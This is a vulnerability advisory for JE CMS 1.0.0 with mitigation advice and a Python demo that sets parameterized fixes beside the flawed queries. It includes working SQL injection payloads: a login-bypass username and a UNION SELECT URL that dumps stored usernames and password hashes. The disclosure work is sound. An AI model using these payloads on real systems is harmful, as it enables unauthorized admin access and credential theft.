vendor:
JE CMS
by:
abysssec.com
7.5
CVSS
HIGH
Bypass Authentication by SQL Injection Vulnerability
89
CWE
Product Name: JE CMS
Affected Version From: JE CMS <= 1.0.0
Affected Version To: JE CMS <= 1.0.0
Patch Exists: NO
Related CWE: N/A
CPE: a:joenasejes.cz.cc:je_cms:1.0.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

JE CMS 1.0.0 Bypass Authentication by SQL Injection Vulnerability

JE CMS 1.0.0 is vulnerable to authentication bypass through SQL injection. administrator/login.php (lines 16-20) takes username and password from $_REQUEST and calls userLogin(), defined in administrator/library/functions.php (lines 129-139). There the username is concatenated directly into the SELECT statement that checks the credentials. The password is passed through getHash() before concatenation, so whether that value is injectable depends on what getHash() returns; the published bypass is carried by the username. Because AND binds tighter than OR, a username of admin' or '1'='1 reduces the WHERE clause to username = 'admin', so the password, usertype and block conditions no longer constrain that account and the attacker is logged in as it. A second, separate injection exists in administrator/index.php: at line 12, $userid is read from $_REQUEST and, for the edituser action, passed unsanitized to getUser(), which concatenates it into the numeric comparison WHERE userid = .... No quote is needed to break out of that context, and a UNION SELECT can read arbitrary data from the users table, such as the username and password columns. Since index.php sits in the administrator area, the login bypass gives an attacker the access needed to reach it.

Mitigation:

Every query that incorporates request data, including both statements above, should be built with parameterized queries (prepared statements with bound values); concatenating $_REQUEST values into SQL strings should be removed, not filtered. Input should also be validated against its expected type before use: userid must be an integer, and the submitted password should be hashed and compared through a bound parameter rather than spliced into the statement. No vendor patch is listed for this issue (Patch Exists: NO above), so these changes would have to be applied to the application code directly.
Source

Exploit-DB raw data:

'''
  __  __  ____         _    _ ____  
 |  \/  |/ __ \   /\  | |  | |  _ \ 
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ < 
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/ 

http://www.exploit-db.com/moaub-28-je-cms-1-0-0-bypass-authentication-by-sql-injection-vulnerability/
'''

 
Title  : JE CMS 1.0.0 Bypass Authentication by SQL Injection Vulnerability
Affected Version : JE CMS <= 1.0.0
Vendor  Site   : joenasejes.cz.cc
Discovery : abysssec.com
  
 
Vulnerabilities:

1. Bypass Authentication by SQL Injection Vulnerability

in administrator\login.php page, lines 16-20:
if (isset($_REQUEST['username'])) {
	$username = $_REQUEST['username'];
	$password = $_REQUEST['password'];
	$result = $core->userLogin();
	
	
userLogin() function is in administrator\library\functions.php. in lines 129-139:
		if ($userName == '' || $password == '') {
			$errorMessage = JE_MISMATCH_USERNAME_PASSWORD;
		}  else {
			// check the database and see if the username and password combo do match
			$sql = "SELECT userid
					FROM users 
					WHERE username = '".$userName."' 		// vulnerability is here
					AND password = '".$this->getHash($password)."'	// vulnerability is here
					AND usertype = 1
					AND block = 0";
			$result = $this->JEQuery($sql);

POC:

in administrator/login.php:

username: admin' or '1'='1
password: admin' or '1'='1

2. SQL injection in administrator\index.php on "userid" parameter:

in administrator\index.php file line 12:
$userid			= 	$_REQUEST['userid'];
lines 52-53:
	case 'edituser' :
		$user = $core->getUser($userid);
		
getUser function is in administrator\library\functions.php file. lines 578-583:

	function getUser($id){
		
		$sql = "SELECT *
				FROM users
				WHERE userid = ".$id;	// vulnerability is here
		$result = $this->JEQuery($sql);

POC:

http://site/joenas-ejes/administrator/index.php?jepage=edituser&userid=1 and 1=2 UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12 from users--
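The following is an added example, not code from JE CMS or from the abysssec advisory. It rebuilds the two query shapes shown above (the userLogin() credential check and the getUser() lookup) against an in-memory SQLite database and runs the advisory's payloads through them, each beside a parameterized version. The table schema, the sample rows, and the md5 stand-in for getHash() are assumptions constructed for the demonstration (the real getHash() is not shown on this page); the MySQL-specific group_concat(username,0x3a,password) in the UNION payload is rewritten in SQLite syntax, and seven padding columns bring the table to the 12 columns that payload assumes.

```python
"""Added example, not JE CMS code: the two vulnerable query shapes from the
advisory rebuilt against an in-memory SQLite database, each next to a
parameterized version. Schema, sample rows and the md5 stand-in for
getHash() are all constructed for this demonstration."""
import hashlib
import sqlite3

# Constructed schema: the five columns the advisory's queries touch, padded to
# 12 columns so the UNION payload's column count matches SELECT *.
SCHEMA = """
CREATE TABLE users (
    userid INTEGER PRIMARY KEY, username TEXT, password TEXT,
    usertype INTEGER, block INTEGER,
    c6 INTEGER DEFAULT 0, c7 INTEGER DEFAULT 0, c8 INTEGER DEFAULT 0,
    c9 INTEGER DEFAULT 0, c10 INTEGER DEFAULT 0, c11 INTEGER DEFAULT 0,
    c12 INTEGER DEFAULT 0
);
"""

# The advisory's login payload verbatim. For the UNION, the MySQL-specific
# group_concat(a,0x3a,b) is rewritten in SQLite syntax.
LOGIN_PAYLOAD = "admin' or '1'='1"
UNION_PAYLOAD = ("1 and 1=2 UNION SELECT 1,2,3,4,"
                 "group_concat(username || ':' || password),"
                 "6,7,8,9,10,11,12 FROM users--")


def get_hash(password):
    """Assumed stand-in for JE CMS getHash(); the real function is not shown."""
    return hashlib.md5(password.encode()).hexdigest()


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    con.executemany(
        "INSERT INTO users (userid, username, password, usertype, block) "
        "VALUES (?, ?, ?, ?, ?)",
        [(1, "admin", get_hash("s3cret-admin"), 1, 0),
         (2, "editor", get_hash("s3cret-editor"), 1, 0),
         (3, "blocked", get_hash("s3cret-blocked"), 1, 1)])
    return con


def vulnerable_login(con, username, password):
    """Same shape as userLogin(): values concatenated straight into the SQL.
    Only the username carries the injection; the password is hashed first."""
    sql = ("SELECT userid FROM users WHERE username = '" + username + "' "
           "AND password = '" + get_hash(password) + "' "
           "AND usertype = 1 AND block = 0")
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def safe_login(con, username, password):
    """Parameterized: the payload is compared as a literal username."""
    sql = ("SELECT userid FROM users WHERE username = ? AND password = ? "
           "AND usertype = 1 AND block = 0")
    row = con.execute(sql, (username, get_hash(password))).fetchone()
    return row[0] if row else None


def vulnerable_get_user(con, userid):
    """Same shape as getUser(): unquoted numeric context, no quote needed."""
    return con.execute("SELECT * FROM users WHERE userid = " + userid).fetchall()


def safe_get_user(con, userid):
    """Reject non-numeric input before it reaches the query, then bind it."""
    if not userid.isdigit():
        raise ValueError("userid must be a positive integer")
    return con.execute("SELECT * FROM users WHERE userid = ?",
                       (int(userid),)).fetchall()


def run_demo():
    con = make_db()
    results = {
        "legit_vuln": vulnerable_login(con, "admin", "s3cret-admin"),
        "bypass_vuln": vulnerable_login(con, LOGIN_PAYLOAD, LOGIN_PAYLOAD),
        # AND binds tighter than OR, so the injected clause also discards the
        # usertype and block checks: a blocked account logs in too.
        "bypass_blocked": vulnerable_login(con, "blocked' or '1'='1", "x"),
        "bypass_safe": safe_login(con, LOGIN_PAYLOAD, LOGIN_PAYLOAD),
        "legit_safe": safe_login(con, "admin", "s3cret-admin"),
        # Column 5 of the UNION row holds every username:password pair.
        "union_dump": vulnerable_get_user(con, UNION_PAYLOAD)[0][4],
    }
    try:
        safe_get_user(con, UNION_PAYLOAD)
        results["union_rejected"] = False
    except ValueError:
        results["union_rejected"] = True
    return results


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

Running the block shows the vulnerable login returning the admin row for the injected username whatever the password is, and returning the blocked account as well, since the injected OR clause also removes the usertype and block conditions; the parameterized login returns nothing for the payload and still accepts the real credentials. The unquoted userid lookup returns a single UNION row whose fifth column lists every username and stored password value, while the integer check in safe_get_user() rejects the payload before any SQL runs.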